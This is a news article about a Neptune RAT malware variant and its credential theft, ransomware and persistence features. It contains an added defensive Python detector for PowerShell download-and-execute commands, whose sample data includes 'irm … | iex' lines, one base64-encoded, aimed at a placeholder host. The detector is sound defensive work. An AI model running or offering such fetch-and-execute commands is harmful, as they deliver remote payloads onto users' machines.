This potent malware variant can hijack your Windows PC, steal passwords, and more: Neptune RAT is spreading on GitHub, Telegram, and even YouTube – and experts warn 'anyone could use it to launch attacks'
Neptune RAT can hijack Windows PCs and steal passwords – and it's spreading fast


A new version of the Neptune RAT malware has emerged, security researchers have warned, and is spreading on GitHub, Telegram, and even YouTube.
The remote access trojan is 'an extremely serious threat' being offered on the ransomware-as-a-service model, according to researchers at Cyfirma.
Affecting Windows devices, it hijacks Chromium-based browsers including Chrome, Brave, and Opera using a Chromium.dll attack that decrypts stored login data and installs itself as a scheduled Windows task.
It includes a crypto clipper and a password stealer with the ability to exfiltrate the credentials of more than 270 different applications, along with ransomware capabilities and live desktop monitoring.
Advanced anti-analysis techniques and persistence methods, such as modifying the Windows Registry and adding tasks to the Task Scheduler, mean it can maintain its presence on the victim’s system for extended periods of time.
"The analysis of the latest version of Neptune RAT reveals a sophisticated and highly dangerous piece of malware designed for persistent, covert operations on Windows systems," Cyfirma researchers said.
"Its ability to generate direct PowerShell commands (using irm and iex) enables seamless delivery and execution, effectively bypassing traditional security measures. It also has the capability to destroy Windows OS and features advanced password-grabbing functionalities."
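As a defender-side illustration of the `irm`/`iex` delivery the researchers describe, the following added example (not code from the article or from Cyfirma) flags process command lines that both fetch remote content and execute it, including when the command is hidden behind PowerShell's `-EncodedCommand`. The function names, the sample command lines and the `example.invalid` host are constructed for illustration.

```python
import base64
import re

# irm and iex are the built-in aliases of Invoke-RestMethod and Invoke-Expression.
FETCH = re.compile(r"(?<![\w-])(irm|invoke-restmethod)(?![\w-])", re.I)
EXEC = re.compile(r"(?<![\w-])(iex|invoke-expression)(?![\w-])", re.I)
# Any -e... switch followed by a base64-looking argument; checked below.
SWITCH = re.compile(r"\s-(e[a-z]*)\s+([A-Za-z0-9+/=]{8,})", re.I)


def views(cmdline):
    """Return the raw command line plus any decoded -EncodedCommand payloads."""
    out = [cmdline]
    for flag, blob in SWITCH.findall(cmdline):
        flag = flag.lower()
        # PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -enc, ...).
        if flag == "ec" or "encodedcommand".startswith(flag):
            try:
                out.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
            except ValueError:  # bad base64 or not UTF-16LE: keep the raw view only
                pass
    return out


def is_download_and_execute(cmdline):
    """True when one view of the command both fetches remote content and executes it."""
    return any(FETCH.search(v) and EXEC.search(v) for v in views(cmdline))


def encode(script):
    """Build a constructed -EncodedCommand argument (base64 of UTF-16LE text)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation command lines; example.invalid is a placeholder host.
SAMPLES = [
    'powershell.exe -NoProfile -Command "irm https://example.invalid/a.ps1 | iex"',
    "powershell.exe -NoP -W Hidden -enc " + encode("irm https://example.invalid/a.ps1 | iex"),
    "powershell.exe -Command \"Invoke-Expression (Invoke-RestMethod 'https://example.invalid/x')\"",
    'powershell.exe -Command "Invoke-RestMethod https://example.invalid/api/health"',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_download_and_execute(line), line[:70])
```

The check covers only literal and base64-encoded command lines; PowerShell script block logging records the deobfuscated script text and is the better source for anything more heavily obfuscated.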
Neptune RAT lowers the bar for cyber criminals
The new version has been made available without the source code, making analysis more challenging. Notably, it's being offered via an unusual model, with the developer claiming that while it's free to use, there's a more advanced version behind a paywall.
Chris Hauk, consumer privacy advocate at Pixel Privacy, said the emergence of the new Neptune RAT variant shows the “try it before you buy it era of malware has arrived”.
"Neptune RAT is available as a download from GitHub, making it available to a wider variety of internet users than usual," he said.
"As antivirus and anti-malware apps have not yet been able to detect and remove Neptune RAT, internet users will need to stay alert and practice safe computing by not clicking on links or opening attachments that are shared by unknown users."
Paul Bischoff, consumer privacy advocate at Comparitech, echoed Hauk’s comments, noting that the accessibility of the variant will have wide-reaching implications for consumers and enterprises alike and lower the barrier of entry for cyber criminals.
"The maker of Neptune RAT is giving their malware out for free, so it's not just one hacker group we need to worry about," he said.
"Anyone could use it to launch attacks through email, text, ads, or download links. Once the malware has infected a system, it is extremely destructive, dangerous, and hard to remove."
Given its anti-detection features, the new Neptune RAT version is hard to avoid, Cyfirma researchers said, adding that this poses a “significant risk to both individuals and organizations”.
"Continuous monitoring, robust endpoint protection, and proactive threat detection strategies are crucial to mitigating the impact of this malware."
Emma Woollacott is a freelance journalist writing for publications including the BBC, Private Eye, Forbes, Raconteur and specialist technology titles.